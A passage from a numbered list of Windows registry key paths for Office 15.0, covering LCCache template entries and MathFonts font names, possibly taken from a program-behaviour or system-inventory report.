  1157. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
  1158. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
  1159. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
  1160. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
  1161. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
  1162. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
  1163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
  1164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
  1165. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
  1166. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
  1167. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
  1168. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
  1169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
  1170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
  1171. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
  1172. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
  1173. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
  1174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
  1175. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
  1176. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
  1177. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
  1178. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
  1179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
  1180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
  1181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
  1182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
  1183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
  1184. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
  1185. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
  1186. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
  1187. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
  1188. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
  1189. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
  1190. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
  1191. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Arial Unicode MS",
  1192. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Batang",
  1193. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@BatangChe",
  1194. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@DFKai-SB",
  1195. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Dotum",
  1196. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@DotumChe",
  1197. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@FangSong",
  1198. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Gulim",
  1199. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@GulimChe",
  1200. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Gungsuh",
  1201. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@GungsuhChe",
  1202. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@KaiTi",
  1203. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Malgun Gothic",
  1204. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Meiryo",
  1205. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Meiryo UI",
  1206. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft JhengHei",
  1207. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft JhengHei UI",
  1208. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft YaHei",
  1209. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft YaHei UI",
  1210. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU",
  1211. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU_HKSCS",
  1212. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU_HKSCS-ExtB",
  1213. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU-ExtB",
  1214. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS Gothic",
  1215. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS Mincho",
  1216. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS PGothic",
  1217. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS PMincho",
  1218. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS UI Gothic",
  1219. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@NSimSun",
  1220. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@PMingLiU",
  1221. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@PMingLiU-ExtB",
  1222. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimHei",
  1223. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimSun",
  1224. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimSun-ExtB",
  1225. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Agency FB",
  1226. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Aharoni",
  1227. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Algerian",
  1228. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Andalus",
  1229. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Angsana New",
  1230. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\AngsanaUPC",
  1231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Aparajita",
  1232. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arabic Typesetting",
  1233. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial",
  1234. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Black",
  1235. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Narrow",
  1236. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Rounded MT Bold",
  1237. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Unicode MS",
  1238. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Baskerville Old Face",
  1239. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Batang",
  1240. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\BatangChe",
  1241. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bauhaus 93",
  1242. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bell MT",
  1243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Berlin Sans FB",
  1244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Berlin Sans FB Demi",
  1245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bernard MT Condensed",
  1246. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Blackadder ITC",
  1247. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT",
  1248. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Black",
  1249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Condensed",
  1250. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Poster Compressed",
  1251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Book Antiqua",
  1252. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bookman Old Style",
  1253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bookshelf Symbol 7",
  1254. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bradley Hand ITC",
  1255. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Britannic Bold",
  1256. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Broadway",
  1257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Browallia New",
  1258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\BrowalliaUPC",
  1259. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Brush Script MT",
  1260. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calibri",
  1261. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calibri Light",
  1262. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Californian FB",
  1263. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calisto MT",
  1264. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cambria",
  1265. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cambria Math",
  1266. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Candara",
  1267. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Castellar",
  1268. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Centaur",
  1269. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century",
  1270. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century Gothic",
  1271. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century Schoolbook",
  1272. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Chiller",
  1273. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Colonna MT",
  1274. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Comic Sans MS",
  1275. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Consolas",
  1276. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Constantia",
  1277. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cooper Black",
  1278. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Copperplate Gothic Bold",
  1279. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Copperplate Gothic Light",
  1280. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Corbel",
  1281. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cordia New",
  1282. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\CordiaUPC",
  1283. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Courier New",
  1284. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Curlz MT",
  1285. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DaunPenh",
  1286. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\David",
  1287. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DFKai-SB",
  1288. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DilleniaUPC",
  1289. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DokChampa",
  1290. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Dotum",
  1291. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DotumChe",
  1292. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Ebrima",
  1293. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Edwardian Script ITC",
  1294. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Elephant",
  1295. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Engravers MT",
  1296. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Bold ITC",
  1297. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Demi ITC",
  1298. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Light ITC",
  1299. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Medium ITC",
  1300. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Estrangelo Edessa",
  1301. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\EucrosiaUPC",
  1302. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Euphemia",
  1303. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FangSong",
  1304. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Felix Titling",
  1305. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Footlight MT Light",
  1306. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Forte",
  1307. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Book",
  1308. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Demi",
  1309. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Demi Cond",
  1310. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Heavy",
  1311. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Medium",
  1312. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Medium Cond",
  1313. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FrankRuehl",
  1314. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FreesiaUPC",
  1315. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Freestyle Script",
  1316. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\French Script MT",
  1317. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gabriola",
  1318. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gadugi",
  1319. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Garamond",
  1320. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gautami",
  1321. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Georgia",
  1322. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gigi",
  1323. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT",
  1324. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT Condensed",
  1325. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT Ext Condensed Bold",
  1326. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans Ultra Bold",
  1327. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans Ultra Bold Condensed",
  1328. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gisha",
  1329. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gloucester MT Extra Condensed",
  1330. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Goudy Old Style",
  1331. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Goudy Stout",
  1332. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gulim",
  1333. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\GulimChe",
  1334. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gungsuh",
  1335. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\GungsuhChe",
  1336. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Haettenschweiler",
  1337. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Harlow Solid Italic",
  1338. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Harrington",
  1339. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\High Tower Text",
  1340. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Impact",
  1341. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Imprint MT Shadow",
  1342. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Informal Roman",
  1343. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\IrisUPC",
  1344. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Iskoola Pota",
  1345. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\JasmineUPC",
  1346. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Jokerman",
  1347. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Juice ITC",
  1348. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\KaiTi",
  1349. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kalinga",
  1350. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kartika",
  1351. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Khmer UI",
  1352. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\KodchiangUPC",
  1353. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kokila",
  1354. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kristen ITC",
  1355. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kunstler Script",
  1356. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lao UI",
  1357. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Latha",
  1358. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Leelawadee",
  1359. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Levenim MT",
  1360. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\LilyUPC",
  1361. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Bright",
  1362. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Calligraphy",
  1363. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Console",
  1364. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Fax",
  1365. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Handwriting",
  1366. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans",
  1367. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans Typewriter",
  1368. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans Unicode",
  1369. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Magneto",
  1370. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Maiandra GD",
  1371. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Malgun Gothic",
  1372. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mangal",
  1373. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Marlett",
  1374. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Matura MT Script Capitals",
  1375. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Meiryo",
  1376. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Meiryo UI",
  1377. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Himalaya",
  1378. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft JhengHei",
  1379. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft JhengHei UI",
  1380. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft New Tai Lue",
  1381. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft PhagsPa",
  1382. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Sans Serif",
  1383. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Tai Le",
  1384. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Uighur",
  1385. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft YaHei",
  1386. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft YaHei UI",
  1387. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Yi Baiti",
  1388. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU",
  1389. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU_HKSCS",
  1390. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU_HKSCS-ExtB",
  1391. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU-ExtB",
  1392. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Miriam",
  1393. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Miriam Fixed",
  1394. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mistral",
  1395. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Modern No. 20",
  1396. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mongolian Baiti",
  1397. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Monotype Corsiva",
  1398. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MoolBoran",
  1399. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Gothic",
